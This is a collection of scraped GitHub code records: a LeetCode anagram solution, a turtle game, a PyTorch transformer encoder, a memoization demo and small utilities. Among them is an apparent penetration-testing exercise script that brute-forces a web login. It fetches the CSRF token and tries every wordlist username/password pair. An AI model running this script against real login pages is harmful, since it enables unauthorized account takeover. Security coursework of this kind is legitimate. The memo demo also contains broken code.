file_size))\n","repo_name":"Virteip/AirBnB_clone_v2","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"17448220869","text":"# https://leetcode.com/problems/group-anagrams/\n\"\"\"\nGiven an array of strings strs, group the anagrams together.\nYou can return the answer in any order.An Anagram is a word or phrase\nformed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nExample 1:\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n\nExample 2:\nInput: strs = [\"\"]\nOutput: [[\"\"]]\n\nExample 3:\nInput: strs = [\"a\"]\nOutput: [[\"a\"]]\n\nConstraints:\n1 <= strs.length <= 104\n0 <= strs[i].length <= 100\nstrs[i] consists of lowercase English letters.\n\"\"\"\n\n\"\"\"\nA naive solution is to first have a check_anagram function and then\nstart appending strs to an answer list, while checking if the current str\nis anagram with any of the existing groups of anagrams. The complexity\nwill be O(number of groups * total strings in the input)\n\nA faster approach is O(n) and uses hashmap to determine which group\nto add the current string to. The key of the hashmap is cleverly formed\nusing the count of different characters that appear in the str. 
Since\nwe know the string is only made of lowercase letters, we can have a static\narray of length 26 (initialized to 0), traverse the str and increase the\ncorresponding character counters by 1, join all the 26 numbers by an _\nand the resulting str is the key to which we will append all the anagrams.\nIn this approach, we only traverse the input list once and insertion into\nthe map is always O(1), so for all elements it is still O(n), making the\nentire solution O(n).\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n        # convert each string to a hash representing count of characters\n        anagram_hash = {}\n        for i in range(len(strs)):\n            char_count_arr = [0] * 26\n            for j in range(len(strs[i])):\n                char_count_arr[ord(strs[i][j]) - ord(\"a\")] += 1\n\n            curr_key = \"_\".join(map(str, char_count_arr))\n            try:\n                anagram_hash[curr_key].append(strs[i])\n            except KeyError:\n                anagram_hash[curr_key] = [strs[i]]\n\n        ans = []\n        # convert to ans\n        for k in anagram_hash:\n            ans.append(anagram_hash[k])\n\n        # all done\n        return ans\n","repo_name":"DragonWarrior15/programming-questions","sub_path":"hashmap/anagram_groups.py","file_name":"anagram_groups.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"31490771293","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor('black')\nscreen.tracer(0)\n\ntim = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkeypress(key='Up', fun=tim.move_up)\nscreen.onkeypress(key='Down', fun=tim.move_down)\n\ngame_is_on = True\nwhile game_is_on:\n    time.sleep(0.1)\n    screen.update()\n\n    car_manager.create_cars()\n    car_manager.move_cars()\n\n    # detect collision with car\n    for car in car_manager.cars:\n        if car.distance(tim) < 20:\n            scoreboard.game_over()\n            game_is_on = False\n\n    # detect successful crossing\n    if tim.is_at_finish_line():\n        car_manager.level_up()\n        scoreboard.increase_level()\n        tim.goto_start()\n\nscreen.exitonclick()\n","repo_name":"subsangam/100DaysOfCode-Python","sub_path":"Day23/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"18951909265","text":"import requests\n# import hashlib\nfrom bs4 import BeautifulSoup\n\nbase_url = 'http://localhost:6969'\nlogin_url = f'{base_url}/login.php'\n\nwordlist_file = 'wordlist.txt'\nwordlist = []\n\nsession = None\nlogin_action_url = ''\ncsrf = ''\n\ndef main():\n    global session, csrf, login_action_url\n\n    init_wordlist()\n\n    session = requests.Session()\n\n    response = session.get(login_url)\n    soup = BeautifulSoup(response.content, 'html.parser')\n    \n    # get action attribute from login form\n    # it could just be hard-coded, but doing it like this automates the process\n    login_action = soup.find('form')['action']\n    login_action_url = f'{base_url}{login_action}'\n\n    csrf = soup.find(\"input\", {'name': '_token'})['value']\n\n    result = brute_force()\n\n    if result is None:\n        print('Brute force failed')\n    else:\n        print('\\nBrute force succeeded')\n        print(f'Username: {result[0]}, password: {result[1]}')\n\ndef brute_force():\n    for word1 in wordlist:\n        for word2 in wordlist:\n            payload = {\n                'username': word1,\n                'password': word2,\n                '_token': 
csrf\n }\n\n # if the password is encrypted in the front end\n \n # payload = {\n # 'username': word1,\n # 'password': hashlib.md5(word2.encode()).hexdigest(),\n # '_token': csrf\n # }\n\n response = session.post(login_action_url, data=payload)\n\n if response.url == login_url:\n # auth failed\n print(f'Combination of {word1} and {word2} failed')\n else:\n # auth succeeded\n print(f'Combination of {word1} and {word2} succeeded')\n return word1, word2\n \n return None\n\ndef init_wordlist():\n global wordlist\n\n filelist = open(wordlist_file, 'r')\n for file in filelist:\n wordlist.append(file.strip(\"\\n\"))\n filelist.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sannaggi/ProgPenTest","sub_path":"pert10/pert10.py","file_name":"pert10.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72639401744","text":"import random\n\ndef typoglycemasize(sentence):\n\tparted = sentence.split(' ')\n\tfor i in range(len(parted)):\n\t\tif(len(parted[i]) <= 3):\n\t\t\tcontinue\n\t\tbegin = parted[i][0]\n\t\tmid = list(parted[i][1:-1])\n\t\trandom.shuffle(mid)\n\t\tmid = ''.join(mid)\n\t\tend = parted[i][-1]\n\t\tparted[i] = begin+mid+end\n\treturn ' '.join(parted)\n\t\nprint(typoglycemasize(input('Gimme a sentence: ')))","repo_name":"cman131/CodeChallenges","sub_path":"Typoglycema.py","file_name":"Typoglycema.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"540615834","text":"import torch\r\nimport numpy as np\r\nfrom torch import nn\r\nimport math\r\nimport torch.nn.functional as F\r\n\r\nfrom reformer_pytorch import LSHSelfAttention\r\nfrom reformer_pytorch import LSHAttention\r\n\r\nfrom math import sqrt\r\nfrom utils.masking import TriangularCausalMask, ProbMask\r\nimport time\r\n\r\nclass SkipConnection(nn.Module):\r\n\r\n def __init__(self, module):\r\n super(SkipConnection, self).__init__()\r\n self.module = module\r\n\r\n def forward(self, input):\r\n return input + self.module(input)\r\n\r\n\r\nclass MultiHeadAttention(nn.Module):\r\n def __init__(\r\n self,\r\n n_heads,\r\n input_dim,\r\n embed_dim,\r\n val_dim=None,\r\n key_dim=None\r\n ):\r\n super(MultiHeadAttention, self).__init__()\r\n\r\n if val_dim is None:\r\n val_dim = embed_dim // n_heads\r\n if key_dim is None:\r\n key_dim = val_dim\r\n\r\n self.n_heads = n_heads\r\n self.input_dim = input_dim\r\n self.embed_dim = embed_dim\r\n self.val_dim = val_dim\r\n self.key_dim = key_dim\r\n\r\n self.norm_factor = 1 / math.sqrt(key_dim) # See Attention is all you need\r\n\r\n self.W_query = nn.Parameter(torch.Tensor(n_heads, input_dim, key_dim))\r\n self.W_key = nn.Parameter(torch.Tensor(n_heads, input_dim, key_dim))\r\n self.W_val = nn.Parameter(torch.Tensor(n_heads, input_dim, val_dim))\r\n\r\n self.W_out = nn.Parameter(torch.Tensor(n_heads, val_dim, embed_dim))\r\n self.dropout = nn.Dropout(0.5)\r\n\r\n self.init_parameters()\r\n\r\n def init_parameters(self):\r\n\r\n for param in self.parameters():\r\n stdv = 1. / math.sqrt(param.size(-1))\r\n param.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, q, W_query, W_key, W_val, W_out, h=None, mask=None):\r\n \"\"\"\r\n\r\n :param q: queries (batch_size, n_query, input_dim)\r\n :param h: data (batch_size, graph_size, input_dim)\r\n :param mask: mask (batch_size, n_query, graph_size) or viewable as that (i.e. 
can be 2 dim if n_query == 1)\r\n Mask should contain 1 if attention is not possible (i.e. mask is negative adjacency)\r\n :return:\r\n \"\"\"\r\n if h is None:\r\n h = q # compute self-attention\r\n\r\n # h should be (batch_size, graph_size, input_dim)\r\n batch_size, graph_size, input_dim = h.size()\r\n n_query = q.size(1)\r\n assert q.size(0) == batch_size\r\n assert q.size(2) == input_dim\r\n assert input_dim == self.input_dim, \"Wrong embedding dimension of input\"\r\n\r\n hflat = h.contiguous().view(-1, input_dim)\r\n qflat = q.contiguous().view(-1, input_dim)\r\n\r\n # last dimension can be different for keys and values\r\n shp = (self.n_heads, batch_size, graph_size, -1)\r\n shp_q = (self.n_heads, batch_size, n_query, -1)\r\n\r\n # Calculate queries, (n_heads, n_query, graph_size, key/val_size)\r\n Q = torch.matmul(qflat, W_query).view(shp_q)\r\n # Calculate keys and values (n_heads, batch_size, graph_size, key/val_size)\r\n K = torch.matmul(hflat, W_key).view(shp)\r\n V = torch.matmul(hflat, W_val).view(shp)\r\n\r\n # Calculate compatibility (n_heads, batch_size, n_query, graph_size)\r\n compatibility = self.norm_factor * torch.matmul(Q, K.transpose(2, 3))\r\n\r\n # Optionally apply mask to prevent attention\r\n if mask is not None:\r\n mask = mask.view(1, batch_size, n_query, graph_size).expand_as(compatibility)\r\n compatibility[mask] = -np.inf\r\n\r\n attn = torch.softmax(compatibility, dim=-1)\r\n # attn = self.dropout(attn)\r\n\r\n # If there are nodes with no neighbours then softmax returns nan so we fix them to 0\r\n if mask is not None:\r\n attnc = attn.clone()\r\n attnc[mask] = 0\r\n attn = attnc\r\n\r\n heads = torch.matmul(attn, V)\r\n\r\n out = torch.mm(\r\n heads.permute(1, 2, 0, 3).contiguous().view(-1, self.n_heads * self.val_dim),\r\n W_out.view(-1, self.embed_dim)\r\n ).view(batch_size, n_query, self.embed_dim)\r\n\r\n # Alternative:\r\n # headst = heads.transpose(0, 1) # swap the dimensions for batch and heads to align it for the matmul\r\n # # proj_h = torch.einsum('bhni,hij->bhnj', headst, self.W_out)\r\n # projected_heads = torch.matmul(headst, self.W_out)\r\n # out = torch.sum(projected_heads, dim=1) # sum across heads\r\n\r\n # Or:\r\n # out = torch.einsum('hbni,hij->bnj', heads, self.W_out)\r\n\r\n return out, attn\r\n\r\n\r\nclass Normalization(nn.Module):\r\n\r\n def __init__(self, embed_dim, normalization='batch'):\r\n super(Normalization, self).__init__()\r\n\r\n normalizer_class = {\r\n 'batch': nn.BatchNorm1d,\r\n 'instance': nn.InstanceNorm1d,\r\n 'layer': nn.LayerNorm\r\n }.get(normalization, None)\r\n self.normalizer = normalizer_class(embed_dim)\r\n self.embed_dim = embed_dim\r\n\r\n # Normalization by default initializes affine parameters with bias 0 and weight unif(0,1) which is too large!\r\n # self.init_parameters()\r\n\r\n def init_parameters(self):\r\n\r\n for name, param in self.named_parameters():\r\n stdv = 1. 
/ math.sqrt(param.size(-1))\r\n param.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, input, weights, bias):\r\n\r\n if isinstance(self.normalizer, nn.BatchNorm1d):\r\n return F.batch_norm(input.view(-1, input.size(-1)), running_mean=None, running_var=None, weight=weights, bias=bias, training=True).view(*input.size())\r\n elif isinstance(self.normalizer, nn.InstanceNorm1d):\r\n return F.instance_norm(input.permute(0, 2, 1), running_mean=None, running_var=None, weight=weights, bias=bias, training=True).permute(0, 2, 1)\r\n elif isinstance(self.normalizer, nn.LayerNorm):\r\n return F.layer_norm(input, (self.embed_dim,), weights, bias)\r\n else:\r\n assert self.normalizer is None, \"Unknown normalizer type\"\r\n return input\r\n\r\n\r\nclass AttentionLayer(nn.Module):\r\n def __init__(self, attention, d_model, n_heads, \r\n d_keys=None, d_values=None, mix=False):\r\n super(AttentionLayer, self).__init__()\r\n\r\n d_keys = d_keys or (d_model//n_heads)\r\n d_values = d_values or (d_model//n_heads)\r\n\r\n self.inner_attention = attention\r\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\r\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\r\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\r\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\r\n self.n_heads = n_heads\r\n self.mix = mix\r\n\r\n def forward(self, queries, keys, values, query_weight, query_bias, key_weight, key_bias, value_weight, value_bias, out_weight, out_bias, attn_mask):\r\n B, L, _ = queries.shape\r\n _, S, _ = keys.shape\r\n H = self.n_heads\r\n # queries = self.query_projection(queries).view(B, L, H, -1)\r\n # keys = self.key_projection(keys).view(B, S, H, -1)\r\n # values = self.value_projection(values).view(B, S, H, -1)\r\n queries = F.linear(queries, query_weight, query_bias).view(B, L, H, -1)\r\n keys = F.linear(keys, key_weight, key_bias).view(B, S, H, -1)\r\n values = F.linear(values, value_weight, value_bias).view(B, S, H, -1)\r\n start_time = time.time()\r\n out, attn = self.inner_attention(\r\n queries,\r\n keys,\r\n values,\r\n attn_mask\r\n )\r\n print(time.time()-start_time)\r\n if self.mix:\r\n out = out.transpose(2,1).contiguous()\r\n out = out.view(B, L, -1)\r\n # out = self.out_projection(out)\r\n out = F.linear(out, out_weight, out_bias)\r\n\r\n return out\r\n\r\n\r\n# class MultiHeadAttentionLayer(nn.Module):\r\n\r\n# def __init__(\r\n# self,\r\n# n_heads,\r\n# embed_dim,\r\n# feed_forward_hidden=512,\r\n# normalization='batch',\r\n# ):\r\n# super(MultiHeadAttentionLayer, self).__init__()\r\n# self.attn = MultiHeadAttention(\r\n# n_heads,\r\n# input_dim=embed_dim,\r\n# embed_dim=embed_dim\r\n# )\r\n \r\n# self.norm1 = Normalization(embed_dim, normalization)\r\n# self.ff = nn.Sequential(\r\n# nn.Linear(embed_dim, feed_forward_hidden),\r\n# nn.ReLU(),\r\n# nn.Linear(feed_forward_hidden, embed_dim)\r\n# ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n# self.norm2 = Normalization(embed_dim, normalization)\r\n \r\n# def forward(self, x):\r\n# x = self.attn(x)\r\n# x = self.norm1(x)\r\n# x = self.ff(x)\r\n# x = self.norm2(x)\r\n# return x\r\n\r\n# def functional_forward(self, h, params):\r\n \r\n # h = h + self.attn(h, params[f'embedder.layer1_multi.W_query'], params[f'embedder.layer1_multi.W_key'], params[f'embedder.layer1_multi.W_val'], params[f'embedder.layer1_multi.W_out'])\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm1.normalizer.weight'], params[f'embedder.layer1_norm1.normalizer.bias'])\r\n # if 
self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], params[f'embedder.layer1_seq.2.weight'], params[f'embedder.layer1_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm2.normalizer.weight'], params[f'embedder.layer1_norm2.normalizer.bias']) \r\n\r\n\r\n#### positional encoding ####\r\nclass PositionalEncoding(nn.Module):\r\n def __init__(self, d_model, max_len=1000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(0.5)\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0)\r\n # pe.requires_grad = False\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n return self.dropout(x + self.pe[:, :x.size(1)])\r\n \r\n\r\nclass MultiHeadAttentionLayer(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n feed_forward_hidden=512,\r\n normalization='batch',\r\n ):\r\n super(MultiHeadAttentionLayer, self).__init__()\r\n\r\n self.embed_dim = embed_dim\r\n self.self_attn = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n \r\n self.dropout = nn.Dropout(0.5)\r\n self.norm1 = Normalization(embed_dim, normalization)\r\n # self.norm1 = nn.LayerNorm(embed_dim)\r\n self.ff = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n # self.norm2 = nn.LayerNorm(embed_dim)\r\n self.norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n \r\n def forward(self, x):\r\n x, attn = self.self_attn(x)\r\n x = x+ self.dropout(x)\r\n x = self.norm1(x)\r\n x = self.ff(x)\r\n x = self.norm2(x)\r\n return x\r\n\r\n def functional_forward(self, x, params, layer_num):\r\n\r\n # x2 = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x, attn = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x = x + self.dropout(x)\r\n x = self.norm1(x, params[f'embedder.layer{layer_num}.norm1.normalizer.weight'], params[f'embedder.layer{layer_num}.norm1.normalizer.bias'])\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm1.weight'], params[f'embedder.layer{layer_num}.norm1.bias'])\r\n\r\n x = x + SeqFunction(x, params[f'embedder.layer{layer_num}.ff.0.weight'], params[f'embedder.layer{layer_num}.ff.0.bias'], params[f'embedder.layer{layer_num}.ff.2.weight'], params[f'embedder.layer{layer_num}.ff.2.bias'], self.feed_forward_hidden)\r\n x = x + self.dropout(x)\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm2.weight'], 
params[f'embedder.layer{layer_num}.norm2.bias'])\r\n x = self.norm2(x, params[f'embedder.layer{layer_num}.norm2.normalizer.weight'], params[f'embedder.layer{layer_num}.norm2.normalizer.bias'])\r\n \r\n return x, attn\r\n\r\n \r\n \r\ndef SeqFunction(input, weight1, bias1, weight2, bias2, feed_forward_hidden):\r\n if feed_forward_hidden > 0:\r\n x = F.linear(input, weight1, bias1)\r\n x = F.relu(x)\r\n x = F.linear(x, weight2, bias2)\r\n else:\r\n x = F.linear(input, weight1, bias1)\r\n \r\n return x\r\n\r\n\r\n\r\nclass Transformer(nn.Module):\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n n_layers,\r\n node_dim=None,\r\n normalization='batch',\r\n feed_forward_hidden=512\r\n ):\r\n super(Transformer, self).__init__()\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n\r\n self.n_layers = n_layers\r\n # self.layers = nn.Sequential(*(\r\n # MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n # for _ in range(n_layers)\r\n # ))\r\n\r\n self.layer1 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n self.layer2 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n self.layer3 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n\r\n '''\r\n self.layer1_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer1_norm1 = Normalization(embed_dim, normalization)\r\n self.layer1_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer1_norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.layer2_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer2_norm1 = Normalization(embed_dim, normalization)\r\n self.layer2_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer2_norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.layer3_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer3_norm1 = Normalization(embed_dim, normalization)\r\n self.layer3_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer3_norm2 = Normalization(embed_dim, normalization)\r\n '''\r\n\r\n\r\n\r\n def forward(self, x):\r\n\r\n h = x\r\n\r\n h, attn1 = self.layer1(h)\r\n h, attn2 = self.layer2(h)\r\n h, attn3 = self.layer3(h)\r\n\r\n return h, attn3\r\n\r\n # def functional_forward(self, x, params, mask=None):\r\n\r\n # assert mask is None, \"TODO mask not yet supported!\"\r\n\r\n # # Batch multiply to get initial embeddings of nodes\r\n # h = F.linear(x.view(-1, x.size(-1)), params[f'embedder.init_embed.weight'], params[f'embedder.init_embed.bias']).view(*x.size()[:2], -1) if self.init_embed is not None else x\r\n\r\n # h = h + self.layer1_multi(h, params[f'embedder.layer1_multi.W_query'], params[f'embedder.layer1_multi.W_key'], params[f'embedder.layer1_multi.W_val'], params[f'embedder.layer1_multi.W_out'])\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm1.normalizer.weight'], 
params[f'embedder.layer1_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], params[f'embedder.layer1_seq.2.weight'], params[f'embedder.layer1_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm2.normalizer.weight'], params[f'embedder.layer1_norm2.normalizer.bias'])\r\n\r\n\r\n # h = h + self.layer2_multi(h, params[f'embedder.layer2_multi.W_query'], params[f'embedder.layer2_multi.W_key'], params[f'embedder.layer2_multi.W_val'], params[f'embedder.layer2_multi.W_out'])\r\n # h = self.layer2_norm1(h, params[f'embedder.layer2_norm1.normalizer.weight'], params[f'embedder.layer2_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer2_seq.0.weight'], params[f'embedder.layer2_seq.0.bias'], params[f'embedder.layer2_seq.2.weight'], params[f'embedder.layer2_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer2_seq.0.weight'], params[f'embedder.layer2_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer2_norm1(h, params[f'embedder.layer2_norm2.normalizer.weight'], params[f'embedder.layer2_norm2.normalizer.bias'])\r\n\r\n\r\n # h = h + self.layer3_multi(h, params[f'embedder.layer3_multi.W_query'], params[f'embedder.layer3_multi.W_key'], params[f'embedder.layer3_multi.W_val'], params[f'embedder.layer3_multi.W_out'])\r\n # h = self.layer3_norm1(h, params[f'embedder.layer3_norm1.normalizer.weight'], params[f'embedder.layer3_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer3_seq.0.weight'], params[f'embedder.layer3_seq.0.bias'], params[f'embedder.layer3_seq.2.weight'], params[f'embedder.layer3_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer3_seq.0.weight'], params[f'embedder.layer3_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer3_norm1(h, params[f'embedder.layer3_norm2.normalizer.weight'], params[f'embedder.layer3_norm2.normalizer.bias'])\r\n\r\n # return (\r\n # h, # (batch_size, graph_size, embed_dim)\r\n # h.mean(dim=1), # average to get embedding of graph, (batch_size, embed_dim)\r\n # )\r\n \r\n def functional_forward(self, x, params):\r\n\r\n\r\n # Batch multiply to get initial embeddings of nodes\r\n h = x\r\n\r\n h, attn1 = self.layer1.functional_forward(h, params, layer_num = 1)\r\n h, attn2 = self.layer2.functional_forward(h, params, layer_num = 2)\r\n h, attn3 = self.layer3.functional_forward(h, params, layer_num = 3)\r\n\r\n return h, attn3 # (batch_size, graph_size, embed_dim)\r\n \r\n \r\nclass MultiHeadAttentionLayer1(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n feed_forward_hidden=512,\r\n normalization='batch',\r\n ):\r\n super(MultiHeadAttentionLayer1, self).__init__()\r\n\r\n self.embed_dim = embed_dim\r\n self.self_attn = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n \r\n self.dropout = nn.Dropout(0.5)\r\n self.norm1 = Normalization(embed_dim, normalization)\r\n # self.norm1 = nn.LayerNorm(embed_dim)\r\n self.ff = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if 
feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n # self.norm2 = nn.LayerNorm(embed_dim)\r\n self.norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n \r\n def forward(self, x):\r\n x = x+ self.dropout(self.self_attn(x))\r\n x = self.norm1(x)\r\n x = self.ff(x)\r\n x = self.norm2(x)\r\n return x\r\n\r\n def functional_forward(self, x, params, layer_num):\r\n\r\n # x2 = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x = x + self.dropout(self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out']))\r\n x = self.norm1(x, params[f'embedder.layer{layer_num}.norm1.normalizer.weight'], params[f'embedder.layer{layer_num}.norm1.normalizer.bias'])\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm1.weight'], params[f'embedder.layer{layer_num}.norm1.bias'])\r\n\r\n x = x + SeqFunction(x, params[f'embedder.layer{layer_num}.ff.0.weight'], params[f'embedder.layer{layer_num}.ff.0.bias'], params[f'embedder.layer{layer_num}.ff.2.weight'], params[f'embedder.layer{layer_num}.ff.2.bias'], self.feed_forward_hidden)\r\n x = x + self.dropout(x)\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm2.weight'], params[f'embedder.layer{layer_num}.norm2.bias'])\r\n x = self.norm2(x, params[f'embedder.layer{layer_num}.norm2.normalizer.weight'], params[f'embedder.layer{layer_num}.norm2.normalizer.bias'])\r\n \r\n return x\r\n","repo_name":"zhazhagui/AnesFormer","sub_path":"nets/graph_encoder_meta.py","file_name":"graph_encoder_meta.py","file_ext":"py","file_size_in_byte":23104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38659215104","text":"from collections import defaultdict\nimport sys,time\n\ndef multiply(n):\n\treturn (n*10)\n\ndef outer(n):\n\tcache = defaultdict()\t\n\tdef quick():\t\t\t\t\n\t\tif n not in cache:\n\t\t\tprint(\"MISS\")\n\t\t\tresult = multiply(n)\n\t\t\tcache[n] = result\t\t\n\t\t\treturn result\n\t\telse:\n\t\t\treturn cache[n]\n\t\n\treturn quick\n\nfor i in range(0,33000,299):\n\n\tmyFunc = outer(3)\n\tprint(myFunc())\n\nprint(\"DONE CACHING\")\ntime.sleep(2)\n\nfor i in range(0,33000,299):\n\tprint(quick(i)%25)\n\n'''\n# Output to File : \n\norig_stdout = sys.stdout\nf = open('out.txt', 'w')\nsys.stdout = f\t\t\n\t\nprint(quick(999))\nprint(quick(999))\n\n# Output to File :\nsys.stdout = orig_stdout\nf.close()\n'''\n","repo_name":"tuhiniris/Advanced-JavaScript-Codes","sub_path":"Faster Algorithms/_/wrappedmemo.py","file_name":"wrappedmemo.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27484594579","text":"import pickle\nimport hashlib\n\n\ndef serialize(object):\n return pickle.dumps(object)\n\n\ndef deserialize(object_bytes):\n return pickle.loads(object_bytes)\n\n\n# create md5 hex hash value of byte object\ndef hash_code_hex(data_bytes):\n hash_code = hashlib.md5(data_bytes)\n return hash_code.hexdigest()\n\n\n# serialize the PUT request and pack with its md5\ndef serialize_PUT(object):\n object_bytes = 
